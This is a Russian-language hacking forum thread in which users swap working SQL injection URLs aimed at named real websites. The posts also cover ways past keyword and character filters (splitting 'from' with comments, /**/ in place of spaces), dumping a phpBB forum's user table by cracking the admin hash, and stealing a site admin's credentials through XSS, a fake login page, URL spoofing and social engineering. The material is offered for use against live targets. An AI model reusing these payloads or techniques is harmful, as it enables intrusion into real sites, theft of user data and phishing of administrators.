2 WebeX По поводу шелла - мое мнение нельзя. Но тама есть скуля в другом скрипте http://www.0629.com.ua/news.php?cat=-7+union+select+1,2,3,4,database(),version(),7,8,9,10,11,12,13,14,15,user(),17,18,19,20,21,22/* Однако с реализацией будут сложности - у пользователя под которым выполняется скрипт нету доступа ко всем таблицам. Например я пытался обратиться к таблице форума forum.phpbb_users, пишет доступ запрещен. Есть админка сайта /admin/ но таблицы я не нашел, да и туда наверное закрыт доступ....
Реализовал sql инъекцию на одном крупном форуме phpBB, нашел интересующие меня таблицы и колонки,записей там около 6500 штук,меня интересует можно ли как-то вытянуть все записи в один файл,ибо инфа выводится лимитом только по 1 единице. спасибо.
Вариант 1. Можешь просто расшифровать хеш админа, залезть в админку, и слить базу. Вариант 2 (Маловероятный). Если доступен file_priv, то можно сохранить всё что нужно в отдельный файл. Ксс не активная, так что записи в сурс страницы не будет. А ксс в поисковиках довольно распространены. Смотяр какой сайт, если сайт без юзеров (т.е. нету нормальной формы авторизации и т.д.) то толку впринципе 0.
Пипл, у мну маленькая проблема, при запросе к мускулу, фильтруется точка - "." , что не дает возможности селектить из mysql.user, выдает ошибку "Table 'site.mysql_user' doesn't exist" Как обойти фильтрацию точки?
Учим английский язык. doesn't exist == не существует. Да и кто тебе сказал что идёт фильтрация на точку? Дай ссылку
Как с чего я взял что точка фильтруется ? Ну если я посылаю mysql.user, а мне возвращается mysql_user, наверное, точка фильтруется, не просто же так мне вместо точки пробел "_" вернулся Хм, по моему char нельзя использовать в запросе, если селектишь имя таблицы, его мона использовать только при выводе
Скуля: http://wap.intone.ru/games/wgetgame.php?partner=424&id=-22683372+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19/* вроде бы все работает... Но при подборе таблиц с помощью from кидает на непонятную страницу, в чем тут заморочка?
fobofob, в скрипте фильтрация по слову from. ничего не вытащишь оттуда. через эту дырку по крайней мере.
2 fobofob Попробуй вот так fr/**/om если там действительно фильтр на from. Жаль неизвесна ни одна таблица чтобы проверить.
Скуля код: http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,3/* принтабельные поля 2 и 3,но почему-то при запросе version() либо user(),выдает пустую страницу или тут отсекаются все запросы к бд? Подскажите пожалуйста.
Там по моему 5 мускул,так как при запросе information_schema выдается пустая страница,вместо сообщения об ошибке от сервера,значит остается жопный вариант подбирать названия вручную?
fobofob, для вытаскивания колонок из таблицы не нужны user() database() и version()..совсем)) Так что дерзай
несовсем, там парсятся вобще скобки () 2fobofob все работает: Code: http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,table_name%20from%20information_schema.tables/* ЗЫ на одном хек портале была скуля, так там скобки фильтровались, пробелы (ну и плсенги) надо было /**/ ставить, но самое прикольное что в гет запросе был фильтр на префикс к таблицам форума, например если в гет запросе встречается phpbb_ , то сразу кидает на индекс... и такое бывает
Здравствуйте. Помогите пожалуйста, такой вопрос: Есть сайт, вход в админку там через http авторизацию. Так же на сайте есть XSS в поисковике. Каким образом можно отрулить логин и пароль админа ? вот сайт http://www.butik.ru/
Сделать фейк, подснуть админу xss-вектор с редиректом на фейк(при этом заюзав урл спуффинг) и надеяться, что когда он попадет на фейк(и попадет ли вообще), то ему страшно захочеться ввести логин и пароль
Попробуй реализовать поддельную HTTP авторизацию через JavaScript и использовать СИ, например сказать, что в админку можно пройти без пароля и дать ему ссылку. Но если логин и пасс после авторизации сохраняются в кукисы, то можно просто их украсть. А узнать без его помощи вряд ли получится.